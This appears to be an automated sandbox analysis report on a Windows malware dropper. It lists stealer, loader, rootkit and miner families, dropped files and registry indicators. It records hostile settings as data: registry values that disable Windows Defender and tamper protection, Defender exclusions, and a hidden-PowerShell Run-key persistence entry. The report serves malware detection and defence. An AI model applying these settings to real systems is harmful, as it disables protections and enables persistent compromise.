Malware Analysis Report

2025-06-16 01:30

Sample ID 231031-dpwzdaac55
Target 0x0007000000022ce0-53.dat
SHA256 bbde9add91e60b172dee5adb8c6436e07c2adccfc230f1f82454542db4a204f4
Tags
smokeloader amadey dcrat glupteba raccoon redline sectoprat zgrat 6a6a005b9aa778f606280c5fa24ae595 @ytlogsbot grome kinza pixelnew up3 backdoor collection discovery dropper evasion infostealer loader persistence rat rootkit spyware stealer trojan xmrig paypal miner phishing upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

bbde9add91e60b172dee5adb8c6436e07c2adccfc230f1f82454542db4a204f4

Threat Level: Known bad

The file 0x0007000000022ce0-53.dat was found to be: Known bad.

Malicious Activity Summary

smokeloader amadey dcrat glupteba raccoon redline sectoprat zgrat 6a6a005b9aa778f606280c5fa24ae595 @ytlogsbot grome kinza pixelnew up3 backdoor collection discovery dropper evasion infostealer loader persistence rat rootkit spyware stealer trojan xmrig paypal miner phishing upx

Glupteba payload

RedLine payload

Glupteba

RedLine

ZGRat

Suspicious use of NtCreateUserProcessOtherParentProcess

Smokeloader family

Amadey

Raccoon

SmokeLoader

SectopRAT

Raccoon Stealer payload

Modifies Windows Defender Real-time Protection settings

Detect ZGRat V1

xmrig

DcRat

SectopRAT payload

Windows security bypass

Modifies boot configuration data using bcdedit

XMRig Miner payload

Downloads MZ/PE file

Modifies Windows Firewall

Drops file in Drivers directory

Possible attempt to disable PatchGuard

Stops running service(s)

Deletes itself

Windows security modification

Executes dropped EXE

UPX packed file

Loads dropped DLL

Checks computer location settings

Reads user/profile data of web browsers

Adds Run key to start application

Accesses Microsoft Outlook profiles

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Manipulates WinMon driver.

Manipulates WinMonFS driver.

Looks up external IP address via web service

Suspicious use of SetThreadContext

Detected potential entity reuse from brand paypal.

Drops file in System32 directory

Launches sc.exe

Checks for VirtualBox DLLs, possible anti-VM trick

Drops file in Program Files directory

Drops file in Windows directory

Enumerates physical storage devices

Program crash

Unsigned PE

Suspicious use of FindShellTrayWindow

Checks SCSI registry key(s)

Modifies data under HKEY_USERS

Suspicious behavior: LoadsDriver

Modifies system certificate store

Enumerates system info in registry

outlook_win_path

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Modifies Internet Explorer settings

outlook_office_path

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-31 03:11

Signatures

Smokeloader family

smokeloader

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-31 03:11

Reported

2023-10-31 03:14

Platform

win7-20231025-en

Max time kernel

147s

Max time network

152s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x0007000000022ce0-53.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\8C8B.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\8C8B.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\8C8B.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\8C8B.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\8C8B.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\8C8B.exe N/A

Raccoon

stealer raccoon

Raccoon Stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

ZGRat

rat zgrat

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
File created C:\Windows\system32\drivers\Winmon.sys C:\Windows\rss\csrss.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Program Files\Google\Chrome\updater.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\F68A.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\8594.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8798.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8A39.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8C8B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\934F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9968.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Vd594oN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B5BF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C682.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DFED.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EC8B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\F68A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FB7B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\8594.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8594.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\934F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Vd594oN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B5BF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B5BF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B5BF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B5BF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B5BF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B5BF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EC8B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EC8B.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DFED.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\system32\taskeng.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\8C8B.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\8C8B.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\SOFTWARE\Microsoft\Office\12.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\F68A.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\SOFTWARE\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\F68A.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\F68A.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\F68A.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\F68A.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\C682.exe'\"" C:\Users\Admin\AppData\Local\Temp\C682.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\8594.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Manipulates WinMon driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMon C:\Windows\rss\csrss.exe N/A

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
File created C:\Windows\Logs\CBS\CbsPersist_20231031031256.cab C:\Windows\system32\makecab.exe N/A
File created C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x0007000000022ce0-53.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x0007000000022ce0-53.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x0007000000022ce0-53.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d0f49d17a80bda01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "405486902" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
